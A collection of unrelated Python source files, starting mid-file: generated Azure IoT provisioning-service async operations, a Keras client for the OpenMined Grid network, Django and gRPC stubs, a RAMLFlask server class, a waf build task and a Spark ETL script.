~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SharedAccessSignatureAuthorizationRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_keys_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_keys.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_keys_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("SharedAccessSignatureAuthorizationRuleListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/listkeys'} # type: ignore
@distributed_trace_async
async def list_keys_for_key_name(
self,
provisioning_service_name: str,
key_name: str,
resource_group_name: str,
**kwargs: Any
) -> "_models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription":
"""Get a shared access policy by name from a provisioning service.
List primary and secondary keys for a specific key name.
:param provisioning_service_name: Name of the provisioning service.
:type provisioning_service_name: str
:param key_name: Logical key name to get key-values for.
:type key_name: str
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SharedAccessSignatureAuthorizationRuleAccessRightsDescription, or the result of
cls(response)
:rtype:
~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_keys_for_key_name_request(
provisioning_service_name=provisioning_service_name,
key_name=key_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_keys_for_key_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('SharedAccessSignatureAuthorizationRuleAccessRightsDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_keys_for_key_name.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/keys/{keyName}/listkeys'} # type: ignore
@distributed_trace_async
async def list_private_link_resources(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.PrivateLinkResources":
"""List private link resources.
List private link resources for the given provisioning service.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResources, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.PrivateLinkResources
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResources"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_private_link_resources_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_private_link_resources.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResources', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_private_link_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateLinkResources'} # type: ignore
@distributed_trace_async
async def get_private_link_resources(
self,
resource_group_name: str,
resource_name: str,
group_id: str,
**kwargs: Any
) -> "_models.GroupIdInformation":
"""Get the specified private link resource.
Get the specified private link resource for the given provisioning service.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:param group_id: The name of the private link resource.
:type group_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: GroupIdInformation, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.GroupIdInformation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.GroupIdInformation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_private_link_resources_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
group_id=group_id,
template_url=self.get_private_link_resources.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('GroupIdInformation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_private_link_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateLinkResources/{groupId}'} # type: ignore
@distributed_trace_async
async def list_private_endpoint_connections(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> List["_models.PrivateEndpointConnection"]:
"""List private endpoint connections.
List private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of PrivateEndpointConnection, or the result of cls(response)
:rtype: list[~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.PrivateEndpointConnection"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_private_endpoint_connections_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_private_endpoint_connections.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[PrivateEndpointConnection]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_private_endpoint_connections.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections'} # type: ignore
@distributed_trace_async
async def get_private_endpoint_connection(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> "_models.PrivateEndpointConnection":
"""Get private endpoint connection.
Get private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateEndpointConnection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_private_endpoint_connection_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
template_url=self.get_private_endpoint_connection.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_private_endpoint_connection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
async def _create_or_update_private_endpoint_connection_initial(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: "_models.PrivateEndpointConnection",
**kwargs: Any
) -> "_models.PrivateEndpointConnection":
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateEndpointConnection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(private_endpoint_connection, 'PrivateEndpointConnection')
request = build_create_or_update_private_endpoint_connection_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_private_endpoint_connection_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_private_endpoint_connection_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update_private_endpoint_connection(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: "_models.PrivateEndpointConnection",
**kwargs: Any
) -> AsyncLROPoller["_models.PrivateEndpointConnection"]:
"""Create or update private endpoint connection.
Create or update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
:type private_endpoint_connection:
~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateEndpointConnection"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_private_endpoint_connection_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
private_endpoint_connection=private_endpoint_connection,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update_private_endpoint_connection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
async def _delete_private_endpoint_connection_initial(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> Optional["_models.PrivateEndpointConnection"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.PrivateEndpointConnection"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_private_endpoint_connection_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
template_url=self._delete_private_endpoint_connection_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_private_endpoint_connection_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
@distributed_trace_async
async def begin_delete_private_endpoint_connection(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.PrivateEndpointConnection"]:
"""Delete private endpoint connection.
Delete private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateEndpointConnection"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_private_endpoint_connection_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete_private_endpoint_connection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
| StarcoderdataPython |
181203 | <reponame>cthorey/Grid<filename>grid/clients/keras.py
from . import base
from ..lib import utils
from .. import channels
import ipywidgets as widgets
import json
import random
from ..lib import keras_utils
class KerasClient(base.BaseClient):
def __init__(self,
min_om_nodes=1,
known_workers=list(),
include_github_known_workers=True,
verbose=True):
super().__init__(
min_om_nodes=min_om_nodes,
known_workers=known_workers,
include_github_known_workers=include_github_known_workers,
verbose=verbose)
def fit(self,
model,
input,
target,
valid_input=None,
valid_target=None,
batch_size=1,
epochs=1,
log_interval=1,
message_handler=None,
preferred_node='random'):
if ('p2p-circuit' in preferred_node or '/' in preferred_node):
preferred_node = preferred_node.split("/")[-1]
if (preferred_node == 'random'):
nodes = self.get_openmined_nodes()
preferred_node = nodes[random.randint(0, len(nodes) - 1)]
print("PREFERRED NODE:" + str(preferred_node))
if (message_handler is None):
message_handler = self.receive_model
self.spec = self.generate_fit_spec(
model=model,
input=input,
target=target,
valid_input=valid_input,
valid_target=valid_target,
batch_size=batch_size,
epochs=epochs,
log_interval=log_interval,
preferred_node=preferred_node)
self.publish('openmined', self.spec)
self.listen_to_channel_sync(self.spec['train_channel'],
message_handler)
return self.load_model(self.spec['model_addr']), self.spec
def update_progress(self, parent_model, worker_id, num_epochs, epoch_id):
if parent_model not in self.progress:
self.progress[parent_model] = {}
if worker_id not in self.progress[parent_model]:
self.progress[parent_model][worker_id] = 0
p = epoch_id / num_epochs
self.progress[parent_model][worker_id] = p
return p
def max_progress(self, parent_model):
if parent_model not in self.progress:
return 0
max_progress = 0
for worker_id, progress in self.progress[parent_model].items():
if progress > max_progress:
max_progress = progress
return max_progress
def generate_fit_spec(self,
model,
input,
target,
valid_input=None,
valid_target=None,
batch_size=1,
epochs=1,
log_interval=1,
framework='keras',
model_class=None,
preferred_node='first_available'):
model_bin = keras_utils.serialize_keras_model(model)
model_addr = self.api.add_bytes(model_bin)
if model_class is not None:
self.api.add_bytes(model_class)
train_input = utils.serialize_numpy(input)
train_target = utils.serialize_numpy(target)
if (valid_input is None):
valid_input = utils.serialize_numpy(input)
else:
valid_input = utils.serialize_numpy(valid_input)
if (valid_target is None):
valid_target = utils.serialize_numpy(target)
else:
valid_target = utils.serialize_numpy(valid_target)
datasets = [train_input, train_target, valid_input, valid_target]
data_json = json.dumps(datasets)
data_addr = self.api.add_str(data_json)
spec = {}
spec['type'] = "fit"
spec['model_addr'] = model_addr
spec['data_addr'] = data_addr
spec['batch_size'] = batch_size
spec['epochs'] = epochs
spec['log_interval'] = log_interval
spec['framework'] = framework
spec['train_channel'] = 'openmined_train_' + str(model_addr)
spec['preferred_node'] = preferred_node
return spec
def load_model(self, addr):
return keras_utils.ipfs2keras(self.api, addr)
def receive_model(self, message, verbose=True):
msg = utils.unpack(message)
if (msg is not None):
if (msg['type'] == 'transact'):
return keras_utils.ipfs2keras(self.api, msg['model_addr']), msg
elif (msg['type'] == 'log'):
if (verbose):
self.print_model_update(msg)
# Figure out of we should tell this worker to quit.
parent_model = msg['parent_model']
worker_id = msg['worker_id']
num_epochs = msg['num_epochs']
epoch_id = msg['epoch_id']
progress = self.update_progress(parent_model, worker_id,
num_epochs, epoch_id)
max_progress = self.max_progress(parent_model)
if progress < max_progress * 0.75:
quit = {}
quit['op_code'] = 'quit'
self.publish(self.spec['train_channel'] + ':' + worker_id,
quit)
def print_model_update(self, msg):
output = "Worker:" + msg['worker_id'][-5:]
output += " - Epoch " + str(msg['epoch_id']) + " of " + str(
msg['num_epochs'])
output += " - Valid Loss: " + str(msg['eval_loss'])[0:8]
print(output)
def best_models(self, task):
self.show_models = widgets.VBox(
[widgets.HBox([widgets.Label('Model Address')])])
self.listen_to_channel(channels.add_model(task), self.__added_model)
self.publish(channels.list_models, task)
return self.show_models
def __added_model(self, message):
info = self.api.get_json(message['data'])
model_addr = info['model']
hbox = widgets.HBox([widgets.Label(model_addr)])
self.show_models.children += (hbox, )
def send_model(self, name, model_addr):
task = utils.load_task(name)
update = {
'name': name,
'model': model_addr,
'task': task['address'],
'creator': self.id,
'parent': task['address']
}
update_addr = self.api.add_json(update)
self.publish(channels.add_model(name), update_addr)
print("SENDING MODEL!!!!")
def add_model(self, name, model, parent=None):
"""
Propose a model as a solution to a task.
parent - The name of the task. e.g. MNIST
model - A keras model. Down the road we should support more frameworks.
"""
task = utils.load_task(name)
p = None
if parent is None:
p = task['address']
else:
p = parent
model_addr = keras_utils.keras2ipfs(self.api, model)
update = {
'name': name,
'model': model_addr,
'task': task['address'],
'creator': self.id,
'parent': p
}
update_addr = self.api.add_json(update)
self.publish(channels.add_model(name), update_addr)
print(f"ADDED NEW MODELS WEIGHT TO {update_addr}")
| StarcoderdataPython |
25518 | <filename>src/search_items/models.py
from __future__ import unicode_literals
from django.conf import settings
from django.db import models
# Create your models here.
class Search(models.Model):
name = models.CharField(max_length=120)
link = models.CharField(max_length=120)
def __unicode__(self):
return self.name
def __str__(self):
return self.name
| StarcoderdataPython |
3260645 | # Generated by the Protocol Buffers compiler. DO NOT EDIT!
# source: extension.proto
# plugin: grpclib.plugin.main
import abc
import typing
import grpclib.const
import grpclib.client
if typing.TYPE_CHECKING:
import grpclib.server
import extension_pb2
class PodExtensionBase(abc.ABC):
@abc.abstractmethod
async def Unary(self, stream: 'grpclib.server.Stream[extension_pb2.UnaryReq, extension_pb2.UnaryResp]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/podextension.PodExtension/Unary': grpclib.const.Handler(
self.Unary,
grpclib.const.Cardinality.UNARY_UNARY,
extension_pb2.UnaryReq,
extension_pb2.UnaryResp,
),
}
class PodExtensionStub:
def __init__(self, channel: grpclib.client.Channel) -> None:
self.Unary = grpclib.client.UnaryUnaryMethod(
channel,
'/podextension.PodExtension/Unary',
extension_pb2.UnaryReq,
extension_pb2.UnaryResp,
)
| StarcoderdataPython |
32821 | <reponame>nm-wu/RAMLFlask<filename>RAMLFlask/Server.py
import os
from importlib import import_module
from flask import Flask
import ConfigParser
import Printer
class Server:
def __init__(self, generator, comparison, config_file='config.ini'):
# Generator class
self.gen = generator
# Comparison class
self.comp = comparison
cparse = ConfigParser.ConfigParser()
cparse.read(config_file)
self.generated_dir = os.path.join('generated')
self.routes_dir = os.path.join('routes')
self.delegates_dir = os.path.join('delegates')
if cparse.has_section('DIRECTORIES'):
if cparse.has_option('DIRECTORIES', 'generated'):
self.gen.generated_directory = cparse.get('DIRECTORIES', 'generated')
self.comp.generated_directory = cparse.get('DIRECTORIES', 'generated')
if cparse.has_option('DIRECTORIES', 'routes'):
self.gen.routes_directory = cparse.get('DIRECTORIES', 'routes')
self.comp.routes_directory = cparse.get('DIRECTORIES', 'routes')
if cparse.has_option('DIRECTORIES', 'delegates'):
self.gen.delegates_directory = cparse.get('DIRECTORIES', 'delegates')
self.comp.delegates_directory = cparse.get('DIRECTORIES', 'delegates')
def generate(self, generate=True, bind=True):
if generate == True:
self.gen.generate_code()
if bind == True:
self.gen.bind_routes()
def compare(self, p_v=True, p_r=True, p_t=True, static_validations=None, static_rtypes=None, test_in=[]):
self.comp.current_version = self.gen.current_file_name
self.comp.test_res = self.gen.test_res
self.comp.new_v_file = self.gen.new_v_file
self.comp.new_r_file = self.gen.new_r_file
if p_v == True:
out = self.comp.static_valid_analysis(static_validations)
for i in out:
Printer.info_print(i)
if p_r == True:
out = self.comp.static_rtypes_analysis(static_rtypes)
for i in out:
Printer.info_print(i)
if p_t == True:
out = self.comp.test_analysis()
for i in out:
if i[0] == 'INFO':
Printer.info_print(i[1])
else:
Printer.warn_print(i[1])
def start_server(self):
# Creates the basic Flask app
self.app = Flask(__name__)
self.app = Flask(__name__)
folder = self.gen.generated_directory.replace('/', '.').replace('\\', '.') + '.'
while folder[0] == '.':
folder = folder[1:]
while folder[-1] == '.':
folder = folder[:-1]
module = import_module(folder + '.route_mappings', 'route_imports')
self.app.register_blueprint(module.route_imports, url_prefix='')
self.app.run()
def exec_all(self):
self.generate(True, True)
self.compare(True, True, True)
self.start_server() | StarcoderdataPython |
56834 | <gh_stars>1-10
from waflib.Task import Task
class src2cpp(Task):
run_str = '${SRC[0].abspath()} ${SRC[1].abspath()} ${TGT}'
color = 'PINK'
from waflib.TaskGen import extension
@extension('.src')
def process_src(self, node):
tg = self.bld.get_tgen_by_name('comp')
comp = tg.link_task.outputs[0]
tsk = self.create_task('src2cpp', [comp, node], node.change_ext('.cpp'))
self.source.extend(tsk.outputs)
| StarcoderdataPython |
3396226 | #################################
# This script performs the data loading, data preparation and feature enginnering.
# It takes two arguments:
# 1. The configuration file which contains the Azure
# storage account name, key and data source location.
# By default, it is "./Config/storageconfig.json"
# 2. a DEBUG argument which is a string.
# If set to "FILTER_IP", the filtering down two IP addresses takes effect.
# By default, it is "FALSE".
################################
import os
import sys
import time
import datetime
import json
from pandas.tseries.holiday import USFederalHolidayCalendar
from util import write_blob,read_blob
import pyspark
from pyspark import SparkConf
from pyspark import SparkContext
from pyspark import SQLContext
import pyspark.sql.functions as F
from pyspark.sql.functions import concat, col, udf, lag, date_add, explode, lit, unix_timestamp
from pyspark.sql.functions import year, month, weekofyear, dayofmonth, hour, date_format
from pyspark.sql.types import *
from pyspark.sql.types import DateType
from pyspark.sql.dataframe import *
from pyspark.sql.window import Window
from pyspark.sql import Row
from pyspark.ml.classification import *
from pyspark.ml.feature import StringIndexer, OneHotEncoder, VectorAssembler, VectorIndexer
from pyspark.ml.feature import StandardScaler, PCA, RFormula
from pyspark.ml import Pipeline, PipelineModel
from pyspark.sql.types import Row
from pyspark.mllib.linalg import DenseVector
from azureml.logging import get_azureml_logger
# initialize logger
run_logger = get_azureml_logger()
run_logger.log("amlrealworld.bigdata.etl",True)
# load storage configuration
configFilename = "./Config/storageconfig.json"
if len(sys.argv) > 1:
configFilename = sys.argv[1]
with open(configFilename) as configFile:
config = json.load(configFile)
global storageAccount, storageContainer, storageKey, dataFile, duration
storageAccount = config['storageAccount']
storageContainer = config['storageContainer']
storageKey = config['storageKey']
dataFile = config['dataFile']
duration = config['duration']
print("storageContainer " + storageContainer)
DEBUG = 'FALSE'
#'FILTER_IP'
# 3 use a few IP 'FILTER_IP'
if len(sys.argv) > 2:
DEBUG = sys.argv[2]
# 'ONE_MONTH' use a month's data
# 'ONE_YEAR' use a year's data
# 'ALL_YEAR' use all year's data
# 'FULL' use full dataset with duplicated data copies
#path to save the intermediate results and models
path = "wasb://{}@{}.blob.<EMAIL>.windows.net/".format(storageContainer, storageAccount)
# location of the intermediate results
mlSourceDFFile = path + 'mlSource.parquet'
# location of the models
stringIndexModelFile = path + 'stringIndexModel'
oneHotEncoderModelFile = path + 'oneHotEncoderModel'
featureScaleModelFile = path + 'featureScaleModel'
infoFile = "info"
info = None
if duration == 'ONE_MONTH':
trainBegin = '2016-06-01 00:00:00'
trainEnd = '2016-06-30 23:59:59'
testSplitStart = '2016-06-29 00:00:00'
